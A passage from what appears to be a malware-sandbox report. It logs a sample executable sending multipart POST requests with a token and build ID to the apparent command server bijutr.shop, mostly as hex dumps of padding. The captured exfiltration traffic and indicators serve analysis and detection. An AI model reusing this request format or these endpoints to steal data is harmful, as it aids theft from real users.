                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 131557
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 32 44 42 49 35 50 50 48 34 45 55 41 49 4d 4f 48 56 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 44 32 44 42 49 35 50 50 48 34 45 55 41 49 4d 4f 48 56 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 44 32 44 42 49 35 50 50 48 34 45 55 41 49 4d 4f 48 56 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------D2DBI5PPH4EUAIMOHVK6Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------D2DBI5PPH4EUAIMOHVK6Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------D2DBI5PPH4EUAIMOHVK6Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:49 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        28192.168.2.549902188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BS0HDTR1VKF37YUAS2VA
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 6990993
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 30 48 44 54 52 31 56 4b 46 33 37 59 55 41 53 32 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 53 30 48 44 54 52 31 56 4b 46 33 37 59 55 41 53 32 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 42 53 30 48 44 54 52 31 56 4b 46 33 37 59 55 41 53 32 56 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------BS0HDTR1VKF37YUAS2VAContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------BS0HDTR1VKF37YUAS2VAContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------BS0HDTR1VKF37YUAS2VACont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:49 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
